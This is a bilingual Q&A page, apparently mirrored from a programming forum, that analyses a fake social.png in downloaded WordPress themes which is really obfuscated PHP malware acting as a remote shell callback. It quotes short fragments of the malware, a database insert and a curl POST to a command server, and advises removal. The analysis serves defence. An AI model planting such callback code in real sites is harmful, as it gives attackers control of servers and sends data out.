许多wordpress主题中奇怪的虚假social.png的目的是什么 [英] What is the purpose of strange false social.png in many wordpress themes

问题描述

我从一个网站下载了一些 Wordpress 主题，我注意到 social.png 文件中有一个奇怪的包含.查看这个文件，这不是一个真正的 png 文件，而是一个包含难以理解的混淆代码的 php 脚本，对于从其他站点分发的许多 wordpress 插件也是如此.

I have download some Wordpress themes from a website and I have noticed a strange include to social.png file. Looking at this file this is not a real png file but a php script that contains difficult to understand obfuscated code and is the same also for many wordpress plugin distributed from other sites.

文件大小为 45 kb 并具有此哈希值 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63

The file size is 45 kb and have this hash 3FFC93695CA3C919F36D52D07BDB5B198E7C6D63

有人知道这个文件的功能吗?

Someone have an idea of the function of this file?

这个是文件

推荐答案

根据 本论坛发帖:

基本上，它是一个远程 shell 回调，它使用公钥加密，只允许黑客在您的服务器上运行代码.它生成每个安装的 RSA 密钥对，将其上传到命令服务器(它有一个预先设定的列表，但可以从其他受感染的主机动态更新以避免被关闭)使用嵌入式密钥，并通过一个列表发送功能(启用 eval/exec、服务器信息)并将其通过电子邮件发送到文件中找到的电子邮件列表.

Basically, it is a remote shell callback that uses public key encryption to only allow to hacker to run code on your server. It generates a per-install RSA key pair, uploads it to the command server (which it has a preseeded list of, but can dynamically update from other infected hosts to avoid being shut down) using an embedded key and also sends through a list of capabilities (eval/exec enabled, server information) and emails it through to a list of emails found in the file.

它使用 Wordpress 的配置系统来存储其数据，因此请查看您的数据库中名为 WP_CLIENT_KEY 的设置键，它看起来像一堆乱码.

It's using Wordpress's config system to store its data, so have a look in your database for a setting key called WP_CLIENT_KEY which will look like a bunch of garbled text.

一旦激活，exploit 将使用一系列命令在服务器上进行 eval - 可能更多的 shell 或exploit，并且还会将字符串注入页脚.这些字符串可能是黑帽 SEO 垃圾邮件，但它还会注入与之接触的命令和控制服务器列表 - 因此任何其他受感染站点都将使用您的服务器来查找其他站点.

Once active, the exploit will take a list of commands to eval on the server - probably more shells or exploits, and also inject strings into the page footer. These strings are probably blackhat SEO spam, but it also injects a list of command and control servers that it is on contact with aswell - so any other infected sites will be using your server to find others.

正如我在评论中所指出的，该脚本将在 WP 数据库中更新和存储数据:

As I noted in the comments, the script will update and store data in the WP database:

$AKorMlJxhsFuVmuppepc->setQuery("INSERT INTO #__options(option_name, value) values ('{$zgWyMIVCeKwSmjusORA}' , '{$ytnxJjQqCvGdNRBKCigc}')");
...

正如论坛帖子所指出的，这是脚本自己的访问权限.该脚本还通过 shell POST 请求将数据(大概是公钥)发送到指定的服务器:

Which as the forum post pointed out, is for the script's own access. The script also sends data, presumably the public key, to a specified server through a shell POST request:

curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_URL, "http://$gXNjWLFkUQOugyREMXKv");
curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_RETURNTRANSFER, 1);
@curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_FOLLOWLOCATION, true);
if (isset($WbKPQMoSbMZkXUeYKXRI)) {
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($SCvWTGyfCYyeLdjcFFzo, CURLOPT_POSTFIELDS, $WbKPQMoSbMZkXUeYKXRI);
}

无论脚本的确切用途是什么，您都应该删除它的所有引用，并且 尝试完全摆脱脚本.

Regardless of the exact purpose of the script, you should delete all references of it, and attempt to rid yourself of the script completely.

这篇关于许多wordpress主题中奇怪的虚假social.png的目的是什么的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！